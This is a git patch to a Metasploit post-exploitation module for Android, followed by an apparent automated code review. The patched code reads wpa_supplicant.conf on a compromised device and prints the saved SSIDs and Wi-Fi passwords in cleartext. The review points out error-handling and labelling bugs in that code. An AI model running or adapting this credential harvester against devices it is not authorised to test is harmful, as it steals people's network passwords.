From 29467c2e3734d0e416177059cd7a20973eb1831b Mon Sep 17 00:00:00 2001
From: Auxilus
Date: Tue, 1 May 2018 22:58:17 +0530
Subject: [PATCH] Stylize the output
---
 modules/post/android/gather/wireless_ap.rb | 57 ++++++++++++++++++----
 1 file changed, 48 insertions(+), 9 deletions(-)
diff --git a/modules/post/android/gather/wireless_ap.rb b/modules/post/android/gather/wireless_ap.rb
index 2863d03890..700d344a33 100644
--- a/modules/post/android/gather/wireless_ap.rb
+++ b/modules/post/android/gather/wireless_ap.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Post
 include Msf::Post::Common
 include Msf::Post::File
- include Msf::Post::Android::Priv
 include Msf::Post::Android::System
 def initialize(info={})
@@ -25,19 +24,59 @@ class MetasploitModule < Msf::Post
 'Platform' => 'android',
 }
 ))
- register_options([
- OptString.new('SU_BINARY', [true, 'The su binary to execute root commands', 'su'])
- ])
 end
 def run
- unless file?("/system/xbin/#{datastore['SU_BINARY']}")
- print_error("No su binary found")
- return
+ data = read_file("/data/misc/wifi/wpa_supplicant.conf")
+ parsed = data.split("network=")
+ aps ||= []
+ parsed.each do |block|
+ next if block.split("ssid")[1].nil?
+ ssid = block.split("ssid")[1].split("=")[1].split("\n").first.gsub(/"/, '')
+ if search_token(block, "wep_key0")
+ net_type = "WEP"
+ elsif search_token(block, "psk")
+ net_type = "WPS"
+ else
+ net_type = "OPEN"
+ end
+ case net_type
+ when "WEP"
+ pwd = get_password(block, "wep_key0")
+ when "WPS"
+ pwd = get_password(block, "psk")
+ else
+ pwd = ''
+ end
+ aps << [ssid, net_type, pwd]
 end
- data = su_exec("cat /data/misc/wifi/wpa_supplicant.conf", datastore['SU_BINARY'])
- print_line(data)
+ ap_tbl = Rex::Text::Table.new(
+ 'Header' => 'Wireless APs',
+ 'Indent' => 1,
+ 'Columns' => ['SSID','net_type', 'password']
+ )
+
+ aps.each do |ap|
+ ap_tbl << [
+ ap[0],
+ ap[1],
+ ap[2]
+ ]
+ end
+
+ print_line(ap_tbl.to_s)
 end
+ def search_token(block, token)
+ if block.to_s.include?(token)
+ return true
+ else
+ return false
+ end
+ end
+
+ def get_password(block, token)
+ return block.split(token)[1].split("=")[1].split("\n").first.gsub(/"/, '')
+ end
 end
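Review bot: `run` now calls `data.split("network=")` on whatever `read_file` returns, and with the su check and `su_exec` removed in this same hunk nothing handles a session that cannot read `/data/misc/wifi/wpa_supplicant.conf`. If `read_file` returns nil there (the helper is not shown here, so this is inferred), the module raises NoMethodError; on an empty string it prints an empty table with no explanation. A guard right after the read, `if data.nil? || data.empty?` followed by `print_error("Unable to read wpa_supplicant.conf")` and `return`, would restore the error path the old code had. Separately, blocks containing a `psk` key are labelled `"WPS"`, which names a different mechanism from a WPA pre-shared key; `net_type = "WPA-PSK"` in the `elsif` branch and `when "WPA-PSK"` in the `case` would match what the file records. The substring test in `search_token` and the `split("=")[1]` in `get_password` will also misparse an SSID that contains `psk` or a value that itself contains `=`.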